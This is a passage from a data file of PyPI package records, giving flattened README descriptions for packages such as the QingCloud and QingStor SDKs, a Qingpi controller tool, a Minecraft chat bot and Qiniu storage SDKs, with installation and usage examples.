the parameters support the list passing,\nthe values shall be separated byspaces. For example:qingcloud qs set-bucket-acl -b mybucket -A QS_ACL_EVERYONE,READ usr-wmTc0avW,FULL_CONTROLCommand OutputThe returned result of Command is in JSON format.\nFor example, the returned result of describe-keypair of \u2018iaas\u2019 service.:{\n \"action\":\"DescribeKeyPairsResponse\",\n \"total_count\":2,\n \"keypair_set\":[\n {\n \"description\":null,\n \"encrypt_method\":\"ssh-rsa\",\n \"keypair_name\":\"kp 1\",\n \"instance_ids\":[\n \"i-ogbndull\"\n ],\n \"create_time\":\"2013-08-30T05:13:50Z\",\n \"keypair_id\":\"kp-bn2n77ow\",\n \"pub_key\":\"AAAAB3...\"\n },\n {\n \"description\":null,\n \"encrypt_method\":\"ssh-rsa\",\n \"keypair_name\":\"kp 2\",\n \"create_time\":\"2013-08-31T05:13:50Z\",\n \"keypair_id\":\"kp-b2ivaf15\",\n \"pub_key\":\"AAAAB3...\"\n }\n ],\n \"ret_code\":0\n}The returned result of list-objects of \u2018qs\u2019 service.:{\n \"name\": \"mybucket\",\n \"keys\": [\n {\n \"key\": \"myphoto.jpg\",\n \"size\": 67540,\n \"modified\": 1456226022,\n \"mime_type\": \"image/jpeg\",\n \"created\": \"2016-02-23T11:13:42.000Z\"\n },\n {\n \"key\": \"mynote.txt\",\n \"size\": 11,\n \"modified\": 1456298679,\n \"mime_type\": \"text/plain\",\n \"created\": \"2016-02-24T06:49:23.000Z\"\n }\n ],\n \"prefix\": \"\",\n \"owner\": \"qingcloud\",\n \"delimiter\": \"\",\n \"limit\": 20,\n \"marker\": \"mynote.txt\",\n \"common_prefixes\": []\n}"} +{"package": "qingcloud-hpc", "pacakge-description": "This repository allows you to access QingCloud HPC and control your resources from your applications.This SDK is licensed under Apache Licence, Version 2.0."} +{"package": "qingcloud-init", "pacakge-description": "Qinginit is a setup script for qingcloud."} +{"package": "qingcloudrc", "pacakge-description": "just enjoy"} +{"package": "qingcloud-sdk", "pacakge-description": "This repository allows you to accessQingCloudand control your resources from your applications.This SDK is licensed underApache Licence, Version 2.0.NoteRequires Python 2.6 or higher, compatible with Python 3,\nfor more information please seeQingCloud SDK DocumentationInstallationInstall viapip$ pip install qingcloud-sdkUpgrade to the latest version$ pip install --upgrade qingcloud-sdkInstall from sourcegit clone https://github.com/yunify/qingcloud-sdk-python.git\ncd qingcloud-sdk-python\npython setup.py installGetting StartedIn order to operate QingCloud IaaS or QingStor (QingCloud Object Storage),\nyou need applyaccess keyonqingcloud consolefirst.QingCloud IaaS APIPass access key id and secret key into methodconnect_to_zoneto create connection>>> import qingcloud.iaas\n>>> conn = qingcloud.iaas.connect_to_zone(\n 'zone id',\n 'access key id',\n 'secret access key'\n )Call API by using IAM roleIf you would like to call our APIs without access key and secret key (bad things would happen if they were lost or leaked)\nor if you want a finer access control over your instances, there is a easy way to do it :PGo to our IAM service, create an instance role and attach it to your instance.Create connection without access key and secret key.>>> import qingcloud.iaas\n>>> conn = qingcloud.iaas.connect_to_zone(\n 'zone id',\n None,\n None\n )The variableconnis the instance ofqingcloud.iaas.connection.APIConnection,\nwe can use it to call resource related methods. Example:# launch instances\n>>> ret = conn.run_instances(\n image_id='img-xxxxxxxx',\n cpu=1,\n memory=1024,\n vxnets=['vxnet-0'],\n login_mode='passwd',\n login_passwd='Passw0rd@()'\n )\n\n# stop instances\n>>> ret = conn.stop_instances(\n instances=['i-xxxxxxxx'],\n force=True\n )\n\n# describe instances\n>>> ret = conn.describe_instances(\n status=['running', 'stopped']\n )QingCloud QingStor APIPass access key id and secret key into methodconnectto create connection>>> import qingcloud.qingstor\n>>> conn = qingcloud.qingstor.connect(\n 'pek3a.qingstor.com',\n 'access key id',\n 'secret access key'\n )The variableconnis the instance ofqingcloud.qingstor.connection.QSConnection,\nwe can use it to create Bucket which is used for generating Key and MultiPartUpload.Example:# Create a bucket\n>>> bucket = conn.create_bucket('mybucket')\n\n# Create a key\n>>> key = bucket.new_key('myobject')\n>>> with open('/tmp/myfile') as f:\n>>> key.send_file(f)\n\n# Delete the key\n>>> bucket.delete_key('myobject')"} +{"package": "qingdian", "pacakge-description": "A small tool to check the any absentee.By comparing the left text panel with right text panel and it sort out the missing part.\u4eba\u8d24\u9f50(renxianqi aka qingdian)\uff0c\u4e00\u4e2a\u5c0f\u5de5\u5177\u7528\u6765\u67e5\u8be2\u51fa\u5e2d\u6d3b\u52a8\u7684\u4eba\u6570\u662f\u5426\u5230\u9f50\u4e86\u3002\u901a\u8fc7\u6bd4\u5bf9\u5de6\u8fb9\u8ddf\u53f3\u8fb9\u7684\u5185\u5bb9\uff0c\u8ba1\u7b97\u51fa\u5de6\u8fb9\u8fd8\u6709\u54ea\u4e9b\u4eba\u5458\u6ca1\u6709\u51fa\u5e2d/\u51fa\u73b0\u5728\u53f3\u8fb9\u9762\u677f\u3002Package hosted on [pypi] and powered by [pypi-seed]Installation / \u5b89\u88c5pip install renxianqi\u56fd\u5185\u6307\u5b9a\u955c\u50cf\u5b89\u88c5\uff1apip install renxianqi -i https://pypi.tuna.tsinghua.edu.cn/simple\u6216\u8005\u4e0b\u8f7d\u6e05\u70b9\uff08qingdian\uff09\uff1apip install qingdianpip install qingdian -i https://pypi.tuna.tsinghua.edu.cn/simpleMore Info\u4eba\u8d24\u9f50/\u4e07\u80fd\u6e05\u70b9\u5de5\u5177\uff0c\u9002\u7528\u4e8e\u4e00\u4e0b\u573a\u666f\uff1a\u6e05\u5355\u7c7b\u5185\u5bb9\u6bd4\u8f83\u8bfe\u65f6\u51fa\u52e4\u70b9\u540d\u6d3b\u52a8\u51fa\u5e2d\u60c5\u51b5\u6838\u5bf9\u7b49\u7b49\u573a\u666fAuthorlevin"} +{"package": "qingfengboke", "pacakge-description": "No description available on PyPI."} +{"package": "qing-framework", "pacakge-description": "Framework for building Data pipelines that scales.Installation====```pip install qing-framework```Usage=====Build your first worker-----------------------``` python# normalizer_worker.pyfrom qing_framework import QingWorkerfrom qing_framework import QingMessage as QMclass Normalizer(QingWorker):def process(self, qs):#do your magicformatted_messages = []# messages from queue named 'dummy' are loaded for you automagically inside the qs variable.while message in qs['dummy']:# Each QingMessage has a payload and now you can create your own after modifying!formatted_message = QM( payload=\"formatted: \" + message.payload )formatted_messages.append(formatted_message)#returned messages are automatically writted to output queue!return formatted_messages`````` python# normalizer_manifest.py# This file describes worker's responsibility and dependencies.{'name':'normalizer','author': 'AlSayed Gamal','version': '0.0.1','description': 'normalizes messages into proper format!','in-queues': ['dummy'],'out-queues': ['normalized'],'activity-rate': '5000','class': 'Normalizer'}```Run worker using CLI--------------------You can start qing as a server and use qing's CLI to run and scale the worker```bash#queen cli and UI for qing framework.qing --help # just in case you needed help.qingd # qing deamon, you will need sudo permissionqing run Normalizer # run a specific workerqing kill Normalizer --job-id=123 #kill specific worker job```Monitor the data-pipeline using Web-UI--------------------------------------```bashqing --webserver --port=8910 # you can view data pipelines, queues, jobs and workers.```"} +{"package": "qinghama", "pacakge-description": "UNKNOWN"} +{"package": "qingjie", "pacakge-description": "test test"} +{"package": "qinglan-bot", "pacakge-description": "\u9752\u5c9aBot\u57fa\u4e8eNoneBot\u7684\u4e0eMinecraft Server\u4e92\u901a\u6d88\u606f\u7684\u673a\u5668\u4eba\u4ecb\u7ecd\u547d\u540d\u7684\u7075\u611f\u6765\u81ea\u4e8e\u6211\u7684\u4e00\u4f4d\u670b\u53cb\u5728\u539f\u63d2\u4ef6\u4e0a\u52a0\u5165\u4e86\u52a8\u6001\u914d\u7f6e\u7684\u529f\u80fd\u6570\u636e\u5e93\u53c2\u8003HarukaBot\u5b89\u88c5\u6587\u6863\uff1a\u4ecd\u5728\u66f4\u65b0\u7684\u9752\u5c9aBot\u6587\u6863NoneBot2pip install qinglan-bot\u7a7a\u76ee\u5f55\u4e0b\u4f7f\u7528\u547d\u4ee4ql runMineCraft Server\u524d\u5f80\u63d2\u4ef6Releases\u4e0b\u8f7d\u5bf9\u5e94\u670d\u52a1\u7aef\u7684jar\u6587\u4ef6\u5e76\u5b89\u88c5jar\u5b89\u88c5\u6587\u6863\u53ef\u53c2\u8003MC_QQ\u547d\u4ee4\u5e2e\u52a9\u4e3a\u9632\u6b62\u4e0e\u5176\u4ed6\u63d2\u4ef6\u51b2\u7a81\u8bf7\u4f7f\u7528ql\u5e2e\u52a9\u6765\u83b7\u53d6\u5e2e\u52a9\u83b7\u53d6\u5df2\u8fde\u63a5\u81f3 WebSocket \u7684 MineCraft\u670d\u52a1\u5668\u670d\u52a1\u5668\u5217\u8868\u52a8\u6001\u63a7\u5236\u9700\u8981\u4e92\u901a\u7684\u7fa4\u804a\u5f00\u542f\u4e92\u901a Server1\u5f00\u542f\u4e92\u901a Server2\u5173\u95ed\u4e92\u901a Server1\u5173\u95ed\u4e92\u901a Server2\u83b7\u53d6\u5f53\u524d\u7fa4\u804a\u5f00\u542f\u4e92\u901a\u7684\u670d\u52a1\u5668\u4e92\u901a\u5217\u8868\u4e3a\u5f53\u524d\u7fa4\u804a\u8bbe\u7f6e\u662f\u5426\u5728\u53d1\u9001\u6d88\u606f\u5230MC\u65f6\u643a\u5e26\u7fa4\u804a\u540d\u79f0\u5f00\u542f\u53d1\u9001\u7fa4\u540d\u5173\u95ed\u53d1\u9001\u7fa4\u540d\u670d\u52a1\u5668\u5728\u53d1\u9001\u6d88\u606f\u81f3\u7fa4\u804a\u65f6\uff0c\u662f\u5426\u643a\u5e26\u670d\u52a1\u5668\u540d\u5f00\u542f\u670d\u52a1\u5668\u540d\u5173\u95ed\u670d\u52a1\u5668\u540d\u670d\u52a1\u5668\u662f\u5426\u542f\u7528Rcon\u6765\u53d1\u9001\u6d88\u606f\u6216\u547d\u4ee4Rcon\u53d1\u9001 \u6d88\u606f\u548c\u547d\u4ee4 \u9002\u7528\u4e8e\u975e\u63d2\u4ef6\u7aef\u670d\u52a1\u5668Rcon\u53d1\u9001\u547d\u4ee4\u9002\u7528\u4e8e\u7eaf\u63d2\u4ef6\u7aef\u5f00\u542frcon\u6d88\u606f \u670d\u52a1\u5668\u540d\u4e28\u5173\u95edrcon\u6d88\u606f \u670d\u52a1\u5668\u540d\u5f00\u542frcon\u547d\u4ee4 \u670d\u52a1\u5668\u540d\u4e28\u5173\u95edrcon\u547d\u4ee4 \u670d\u52a1\u5668\u540d\u4fee\u6539\u670d\u52a1\u5668Rcon\u8fde\u63a5\u4fe1\u606f\u7684IP\u3001\u7aef\u53e3\u3001\u5bc6\u7801\u4e3a\u4fdd\u969c\u5b89\u5168\uff0c\u4ec5\u9650\u8d85\u7ea7\u7528\u6237\u4e0eBot\u79c1\u804a\u4f7f\u7528\u4e3a\u4fdd\u969c\u5b89\u5168\uff0c\u82e5rcon\u5bc6\u7801\u4e3a\u9ed8\u8ba4\u5bc6\u7801\uff0c\u5c06\u4e0d\u4f1a\u8fde\u63a5\u670d\u52a1\u5668\u7684Rcon\u4fee\u6539rconip \u670d\u52a1\u5668\u540d \u65b0ip\u4fee\u6539rcon\u7aef\u53e3 \u670d\u52a1\u5668 \u65b0\u7aef\u53e3\u4fee\u6539rcon\u5bc6\u7801 \u670d\u52a1\u5668 \u65b0\u5bc6\u7801\u67e5\u770b\u6570\u636e\u5e93\u4e2d\u670d\u52a1\u5668\u5217\u8868\u670d\u52a1\u5668\u5217\u8868\u67e5\u770b\u5df2\u7ecf\u8fde\u63a5\u81f3 WebSocket \u7684\u670d\u52a1\u5668\u5217\u8868\u5df2\u8fde\u63a5\u670d\u52a1\u5668\u5217\u8868\u7279\u522b\u611f\u8c22@SK-415\uff1a\u611f\u8c22SK\u4f6c\u7ed9\u4e88\u8bb8\u591a\u4f18\u79c0\u7684\u5efa\u8bae\u548c\u8010\u5fc3\u7684\u89e3\u7b54\u3002@zhz-\u7ea2\u77f3\u5934\uff1a\u611f\u8c22\u7ea2\u77f3\u5934\u5728\u4ee3\u7801\u4e0a\u7684\u5e2e\u52a9SK-415/HarukaBot\uff1a\u611f\u8c22HarukaBot\u5982\u6b64\u4f18\u96c5\u7684\u5404\u7c7b\u65b9\u6cd5NoneBot2\uff1a \u63d2\u4ef6\u4f7f\u7528\u7684\u5f00\u53d1\u6846\u67b6\u3002go-cqhttp\uff1a \u7a33\u5b9a\u5b8c\u5584\u7684 CQHTTP \u5b9e\u73b0\u3002\u8d21\u732e\u4e0e\u652f\u6301\u89c9\u5f97\u597d\u7528\u53ef\u4ee5\u7ed9\u8fd9\u4e2a\u9879\u76ee\u70b9\u4e2aStar\u6216\u8005\u53bb\u7231\u53d1\u7535\u6295\u5582\u6211\u3002\u6709\u610f\u89c1\u6216\u8005\u5efa\u8bae\u4e5f\u6b22\u8fce\u63d0\u4ea4Issues\u548cPull requests\u3002\u8bb8\u53ef\u8bc1\u672c\u9879\u76ee\u4f7f\u7528GNU AGPLv3\u4f5c\u4e3a\u5f00\u6e90\u8bb8\u53ef\u8bc1\u3002"} +{"package": "qinglongapi", "pacakge-description": "qinglongapi\u9752\u9f99api\u7684python SDK\u5177\u4f53\u6587\u6863https://yuxian158.github.io/qinglong-api/\u4f7f\u7528\u65b9\u6cd5\u5b89\u88c5pip install qinglongapi\u6240\u6709\u6a21\u5757\u4f7f\u7528\u65b9\u6cd5\u5927\u540c\u5c0f\u5f02\uff0c\u4ee5\u73af\u5883\u53d8\u91cf\u6a21\u5757\u4e3a\u4f8b:from qlapi import qlenv\n\nql_env = qlenv(\n url=\"12.22.43.23\", #\u9752\u9f99\u9762\u677fIP\u5730\u5740(\u4e0d\u5305\u542bhttp://)\n port=5700,\t\t\t#\u9752\u9f99\u9762\u677f\u7aef\u53e3\n client_id=\"admin\", # \u9752\u9f99\u9762\u677fopenapi\u767b\u5f55\u7528\u6237\u540d\n client_secret=\"abcdefg_\", # \u9752\u9f99\u9762\u677fopenapi\u767b\u5f55\u5bc6\u7801\n)\nql_env.list()\u9752\u9f99api\u6587\u6863https://qinglong.ukenn.top/#/\u5f88\u591a\u8fd8\u6ca1\u6709\u5b8c\u5584\uff0c\u6b22\u8fcepr"} +{"package": "qinglu0330-hello", "pacakge-description": "No description available on PyPI."} +{"package": "qingmi", "pacakge-description": "Qingmi(\u9752\u54aa\uff0c \u53d6\u81ea\u60c5\u8ff7\u8c10\u97f3\uff0c \u6709\u4eb2\u6635\u4e4b\u610f)\u662f\u4e00\u4e2a\u57fa\u4e8ePython3+Flask\u4e8c\u6b21\u5f00\u53d1\u7684\u5e94\u7528\u5c42\u6846\u67b6\uff0c \u5176\u5185\u90e8\u5c01\u88c5\u4e86\u5e38\u7528\u7684\u6a21\u5757\u548c\u5de5\u5177\u96c6\uff0c \u4e3b\u8981\u7528\u4e8e\u9488\u5bf9flask web\u5feb\u901f\u9ad8\u6548\u5f00\u53d1\u3002\u91c7\u7528\u7684\u6280\u672f\u6808\uff1apython3flaskWerkzeugmongoengineceleryfabrichttpieFlask-ScriptFlask-WTFflask-mongoengineFlask-LoginFlask-RESTfulFlask-DebugToolbarFlask-Celery-HelperrequestsFlask-CachingFlask-AdminFlask-UploadsipythonPillowclick\u529f\u80fd\u7279\u6027\uff1a\u6570\u636e\u7edf\u8ba1\u77ed\u4fe1\u53d1\u9001\u90ae\u4ef6\u53d1\u9001\u6587\u4ef6\u4e0a\u4f20\u9a8c\u8bc1\u7801\u9759\u6001\u6587\u4ef6IP\u5904\u7406\u65e5\u5fd7\u901a\u7528\u6a21\u5757\u7528\u6237\u6a21\u5757\u6743\u9650\u7ba1\u7406\u52a8\u6001\u914d\u7f6e\u5b9a\u65f6\u4efb\u52a1(\u4efb\u52a1\u8c03\u5ea6)\u901a\u7528API\u7b2c\u4e09\u65b9\u767b\u5f55\u5fae\u4fe1\u516c\u4f17\u5e73\u53f0\u90e8\u7f72\u8f85\u52a9\u5de5\u5177helper(\u52a0\u89e3\u5bc6[hash/md5]/json/http/ip/\u65e5\u5fd7/\u6b63\u5219\u8868\u8fbe\u5f0f/\u65f6\u95f4\u548c\u65e5\u671f/\u2026)\u5355\u5143\u6d4b\u8bd5\u7528\u6cd5\u6587\u6863"} +{"package": "qingping-ble", "pacakge-description": "Qingping BLEQingping BLE supportInstallationInstall this via pip (or your favourite package manager):pip install qingping-bleContributors \u2728Thanks goes to these wonderful people (emoji key):This project follows theall-contributorsspecification. Contributions of any kind welcome!CreditsThis package was created withCookiecutterand thebrowniebroke/cookiecutter-pypackageproject template."} +{"package": "qingpi-python", "pacakge-description": "qingpi-pythonPython library for Qingpi.$pipinstallqingpi-pythonqingpictlGUI application to control Qingpi with transparent Window and Citra compatible keyboard operation.Currently, only Windows version is available.Run$qingpictl[port]or$python-mqingpi[port]or using pre-built binary> qingpictl.exe [port]You may create batch file like this if you don't want to specify the port from the command line every time.STARTqingpictl.exe COM6Input mappingButtonControlInputAABSXZYXLQRWZL1ZR2STARTMSELECTNHOMEBPOWERVWIRELESSPHatControlInputUPTRIGHTHDOWNGLEFTFSlidePadControlInputUPRIGHTDOWNLEFTCircle Pad Pro(not implemented)ControlInputUPIRIGHTLDOWNKLEFTJHotkeysControlInputExpand window+Shrink window-Developer note$poetryrunpython-mqingpi[port]--debugThe build script requires PyInstaller and ImageMagick.$poetryrunpython-mpipinstallpyinstaller$makePyInstaller is not included in the dev group because PyInstaller has a narrower Python version specification than necessary (e.g. v6.3.0 requires \"<3.13,>=3.8\"), which affects version reqirements of qingpi-python.To avoid security issues,$poetryrunpython-mpipuninstallpyinstaller$gitclonehttps://github.com/pyinstaller/pyinstaller--depth1$cd.\\pyinstaller\\bootloader\\$py.\\wafdistcleanall$cd..\\..\\$poetryrunpython-mpipinstall.\\pyinstaller\\"} +{"package": "qingqiu", "pacakge-description": "\u7b80\u5355\u5f97\u63a5\u53e3\u6d4b\u8bd5\u6846\u67b6"} +{"package": "qingstor-sdk", "pacakge-description": "# QingStor SDK for Python[![Build Status](https://github.com/qingstor/qingstor-sdk-python/workflows/Unit%20Test/badge.svg?branch=master)](https://github.com/qingstor/qingstor-sdk-python/actions?query=workflow%3A%22Unit+Test%22)\n[![API Reference](http://img.shields.io/badge/api-reference-green.svg)](https://docs.qingcloud.com/qingstor/)\n[![License](http://img.shields.io/badge/license-apache%20v2-blue.svg)](https://github.com/yunify/qingstor-sdk-python/blob/master/LICENSE)\n[![Join the chat](https://img.shields.io/badge/chat-online-blue?style=flat&logo=zulip)](https://qingstor.zulipchat.com/join/nofzrqd5a5skt5ebnaor5b7d/)English | [\u4e2d\u6587](README_zh-CN.md)The official QingStor SDK for the Python programming language.Before you start using the SDK, make sure you have a basic understanding of the concepts of [QingStor object storage](https://docs.qingcloud.com/qingstor/api/common/overview.html) (such as Zone, Service, Bucket, Object, etc.).This SDK try to keep a one-to-one correspondence with the methods on the [QingCloud QingStor object storage documentation](https://docs.qingcloud.com/qingstor/api/). For details of each method, please refer to the corresponding chapter in the link.## Quick StartNow you are ready to code. You can read the detailed guides in the list below to have a clear understanding.[Preparation](./docs/prepare.md)[Installation](./docs/install.md)[Configuration](./docs/config.md)[Service Initialization](./docs/service.md)[Code Examples](./docs/examples.md)Checkout our [releases](https://github.com/yunify/qingstor-sdk-python/releases) and [change log](./CHANGELOG.md) for information about the latest features, bug fixes and new ideas.## Reference Documentations[QingStor Documentation](https://docs.qingcloud.com/qingstor/index.html)[QingStor Guide](https://docs.qingcloud.com/qingstor/guide/index.html)[QingStor APIs](https://docs.qingcloud.com/qingstor/api/index.html)## ContributingPlease see [Contributing Guidelines](./CONTRIBUTING.md) of this project before submitting patches.## LICENSEThe Apache License (Version 2.0, January 2004)."} +{"package": "qingtest", "pacakge-description": "Example PackageThis is a simple example package."} +{"package": "qingxun-openapi-python-sdk", "pacakge-description": "No description available on PyPI."} +{"package": "qiniu", "pacakge-description": "see:https://github.com/qiniu/python-sdk"} +{"package": "qiniu4blog", "pacakge-description": "\u5199\u535a\u5ba2\u7528\u7684\u4e03\u725b\u56fe\u5e8a"} +{"package": "qiniu4blog-mk", "pacakge-description": "The author of the origin version of this package is wzyuliyang, the current version is modified by mirsking"} +{"package": "qiniu-async", "pacakge-description": "\u5b89\u88c5\u901a\u8fc7pip$pipinstallqiniu-async\u4f7f\u7528\u65b9\u6cd5\u4e0a\u4f20importasyncioimportqiniu_asyncq=qiniu_async.Qiniu(access_key,access_secret)token=q.upload_token(bucketname)# \u6587\u4ef6\u6d41\u4e0a\u4f20asyncio.run(q.upload_data(token,\"333.txt\",\"123\u6d4b\u8bd5\"))# \u6587\u4ef6\u5730\u5740\u4e0a\u4f20asyncio.run(q.upload_file(token,\"mypic0.jpeg\",\"/Users/liuyue/Downloads/mypic0.jpeg\"))### \u5f02\u6b65\u6846\u67b6\u63a5\u5165#### Tornado```pythonimportqiniu_asyncasyncdefpost(self):file=self.request.files['file']formetainfile:filename=meta['filename']q=qiniu_async.Qiniu(access_key,access_secret)token=q.upload_token(bucketname)awaitq.upload_data(token,filename,meta['body'])returnself.write('Your file has been uploaded')"} +{"package": "qiniu-cli", "pacakge-description": "qiniu-cliQiniu CLI tool.Installpip install qiniu-cliUsage$ qiniu_cli upload requirements.txt\nhttp://tmp-images.qiniudn.com/requirements.txt\n\n$ qiniu_cli upload --save-dir \"comics/2014/\" *.png *.txt\nhttp://tmp-images.qiniudn.com/comics/2014/2014-09-25-EveryFall.zh-cn.png\nhttp://tmp-images.qiniudn.com/comics/2014/3014.painting.png\nhttp://tmp-images.qiniudn.com/comics/2014/requirements.txt\n\n\n$ qiniu_cli --help\nUsage: qiniu_cli [OPTIONS] COMMAND [ARGS]...\n\nOptions:\n -c, --config FILENAME Config file(default: config.json).\n --bucket TEXT Bucket name.\n -v, --verbose Enables verbose mode.\n --version Show the version and exit.\n --help Show this message and exit.\n\nCommands:\n search Search file.\n upload Upload file.\n\n$ qiniu_cli upload --help\nUsage: qiniu_cli upload [OPTIONS] FILES...\n\nOptions:\n --save-name TEXT File save name.\n --save-dir TEXT Upload to directory.\n --auto-name Auto name file by sh1 hex digest with timestamp.\n --help Show this message and exit.Changelog0.1.0 (2014-10-12)Initial Release"} +{"package": "qiniu-django-backend", "pacakge-description": "qiniu_django_backend"} +{"package": "qiniuFolderSync", "pacakge-description": "No description available on PyPI."} +{"package": "qiniufops", "pacakge-description": "# Qiniufops------Qiniu bucket image persistent operations> * `qiniufops.cfg` Configure file,in /etc/qiniu/> * `qiniufops` python scripts,in /usr/local/bin/------## Usage### set qiniufops.cfg configure file, then run qiniufops.```conf[qiniu]`accesskey:` Your qiniu access key`secretkey:` Your qiniu access secret key`bucket:` Qiniu bucket name[fops]One or more image stylename:style,one per lineexample:`stylename1:style1``stylename2:style2``!qsmalllow:imageView2/1/w/320/h/320/q/60````"} +{"package": "qiniufs", "pacakge-description": "Installpip install qiniufsUsage# initbucket_name=\"your-qiniu-bucket-name\"prefix_url=\"your-qiniu-domain\"fs=QiniuFS(bucket_name,access_key,secret_key,prefix_url)# uploadmime=data.mimetyper,d=fs.upload_data(data,mime=mime)ifrandd:key=d.get('key')url=fs.get_url(d.get('key'))# deleter=fs.delete_file(key)ifr:print\"success\"Linksgithub"} +{"package": "qiniu-lite", "pacakge-description": "# coding:utf-8import tornado.ioloopimport tornado.webfrom qiniu_lite import Cowcow = Cow('access key', 'secret key')policy = cow.get_put_policy('bucket name')class MainHandler(tornado.web.RequestHandler):def get(self):self.write('''
''' % policy.token())if __name__ == \"__main__\":application = tornado.web.Application([(r\"/\", MainHandler),])application.listen(8888)tornado.ioloop.IOLoop.instance().start()"} +{"package": "qiniuManager", "pacakge-description": "UNKNOWN"} +{"package": "qiniu-sdk-alpha", "pacakge-description": "Qiniu Resource Storage Binding SDK for Python\u6982\u8981Qiniu SDK for Python \u5305\u542b\u4ee5\u4e0b\u7279\u6027\uff1a\u901a\u8fc7\u63d0\u4f9b\u591a\u4e2a\u4e0d\u540c\u7684 Module\uff0c\u4e3a\u4e0d\u540c\u5c42\u6b21\u7684\u5f00\u53d1\u90fd\u63d0\u4f9b\u4e86\u65b9\u4fbf\u6613\u7528\u7684\u7f16\u7a0b\u63a5\u53e3\u3002\u540c\u65f6\u63d0\u4f9b\u963b\u585e IO \u63a5\u53e3\u548c\u57fa\u4e8e Async/Await \u7684\u5f02\u6b65 IO \u63a5\u53e3\u3002\u7528 PyO3 \u5c01\u88c5 Rust \u4ee3\u7801\u3002\u4ee3\u7801\u793a\u4f8b\u5ba2\u6237\u7aef\u4e0a\u4f20\u51ed\u8bc1\u5ba2\u6237\u7aef\uff08\u79fb\u52a8\u7aef\u6216\u8005Web\u7aef\uff09\u4e0a\u4f20\u6587\u4ef6\u7684\u65f6\u5019\uff0c\u9700\u8981\u4ece\u5ba2\u6237\u81ea\u5df1\u7684\u4e1a\u52a1\u670d\u52a1\u5668\u83b7\u53d6\u4e0a\u4f20\u51ed\u8bc1\uff0c\u800c\u8fd9\u4e9b\u4e0a\u4f20\u51ed\u8bc1\u662f\u901a\u8fc7\u670d\u52a1\u7aef\u7684 SDK \u6765\u751f\u6210\u7684\uff0c\u7136\u540e\u901a\u8fc7\u5ba2\u6237\u81ea\u5df1\u7684\u4e1a\u52a1API\u5206\u53d1\u7ed9\u5ba2\u6237\u7aef\u4f7f\u7528\u3002\u6839\u636e\u4e0a\u4f20\u7684\u4e1a\u52a1\u9700\u6c42\u4e0d\u540c\uff0c\u4e03\u725b\u4e91 Python SDK \u652f\u6301\u4e30\u5bcc\u7684\u4e0a\u4f20\u51ed\u8bc1\u751f\u6210\u65b9\u5f0f\u3002\u7b80\u5355\u4e0a\u4f20\u7684\u51ed\u8bc1\u6700\u7b80\u5355\u7684\u4e0a\u4f20\u51ed\u8bc1\u53ea\u9700\u8981access key\uff0csecret key\u548cbucket\u5c31\u53ef\u4ee5\u3002fromqiniu_sdk_alphaimportupload_token,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'cred=credential.Credential(access_key,secret_key)upload_token=upload_token.UploadPolicy.new_for_bucket(bucket_name,3600).build().to_upload_token_provider(cred)print(upload_token)\u8986\u76d6\u4e0a\u4f20\u7684\u51ed\u8bc1\u8986\u76d6\u4e0a\u4f20\u9664\u4e86\u9700\u8981\u7b80\u5355\u4e0a\u4f20\u6240\u9700\u8981\u7684\u4fe1\u606f\u4e4b\u5916\uff0c\u8fd8\u9700\u8981\u60f3\u8fdb\u884c\u8986\u76d6\u7684\u5bf9\u8c61\u540d\u79f0object name\uff0c\u8fd9\u4e2a\u5bf9\u8c61\u540d\u79f0\u540c\u65f6\u662f\u5ba2\u6237\u7aef\u4e0a\u4f20\u4ee3\u7801\u4e2d\u6307\u5b9a\u7684\u5bf9\u8c61\u540d\u79f0\uff0c\u4e24\u8005\u5fc5\u987b\u4e00\u81f4\u3002fromqiniu_sdk_alphaimportupload_token,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'cred=credential.Credential(access_key,secret_key)upload_token=upload_token.UploadPolicy.new_for_object(bucket_name,object_name,3600).build().to_upload_token_provider(cred)print(upload_token)#### \u81ea\u5b9a\u4e49\u4e0a\u4f20\u56de\u590d\u7684\u51ed\u8bc1\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0c\u6587\u4ef6\u4e0a\u4f20\u5230\u4e03\u725b\u4e4b\u540e\uff0c\u5728\u6ca1\u6709\u8bbe\u7f6e`returnBody`\u6216\u8005\u56de\u8c03\u76f8\u5173\u7684\u53c2\u6570\u60c5\u51b5\u4e0b\uff0c\u4e03\u725b\u8fd4\u56de\u7ed9\u4e0a\u4f20\u7aef\u7684\u56de\u590d\u683c\u5f0f\u4e3a`hash`\u548c`key`\uff0c\u4f8b\u5982\uff1a```json{\"hash\":\"Ftgm-CkWePC9fzMBTRNmPMhGBcSV\",\"key\":\"qiniu.jpg\"}\u6709\u65f6\u5019\u6211\u4eec\u5e0c\u671b\u80fd\u81ea\u5b9a\u4e49\u8fd9\u4e2a\u8fd4\u56de\u7684 JSON \u683c\u5f0f\u7684\u5185\u5bb9\uff0c\u53ef\u4ee5\u901a\u8fc7\u8bbe\u7f6ereturnBody\u53c2\u6570\u6765\u5b9e\u73b0\uff0c\u5728returnBody\u4e2d\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u4e03\u725b\u652f\u6301\u7684\u9b54\u6cd5\u53d8\u91cf\u548c\u81ea\u5b9a\u4e49\u53d8\u91cf\u3002fromqiniu_sdk_alphaimportupload_token,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'cred=credential.Credential(access_key,secret_key)upload_token=upload_token.UploadPolicy.new_for_object(bucket_name,object_name,3600,returnBody='{\"key\":\"$(key)\",\"hash\":\"$(etag)\",\"bucket\":\"$(bucket)\",\"fsize\":$(fsize)}').build().to_upload_token_provider(cred)print(upload_token)\u5219\u6587\u4ef6\u4e0a\u4f20\u5230\u4e03\u725b\u4e4b\u540e\uff0c\u6536\u5230\u7684\u56de\u590d\u5185\u5bb9\u5982\u4e0b\uff1a{\"key\":\"qiniu.jpg\",\"hash\":\"Ftgm-CkWePC9fzMBTRNmPMhGBcSV\",\"bucket\":\"if-bc\",\"fsize\":39335}\u5e26\u56de\u8c03\u4e1a\u52a1\u670d\u52a1\u5668\u7684\u51ed\u8bc1\u4e0a\u9762\u751f\u6210\u7684\u81ea\u5b9a\u4e49\u4e0a\u4f20\u56de\u590d\u7684\u4e0a\u4f20\u51ed\u8bc1\u9002\u7528\u4e8e\u4e0a\u4f20\u7aef\uff08\u65e0\u8bba\u662f\u5ba2\u6237\u7aef\u8fd8\u662f\u670d\u52a1\u7aef\uff09\u548c\u4e03\u725b\u670d\u52a1\u5668\u4e4b\u95f4\u8fdb\u884c\u76f4\u63a5\u4ea4\u4e92\u7684\u60c5\u51b5\u4e0b\u3002\u5728\u5ba2\u6237\u7aef\u4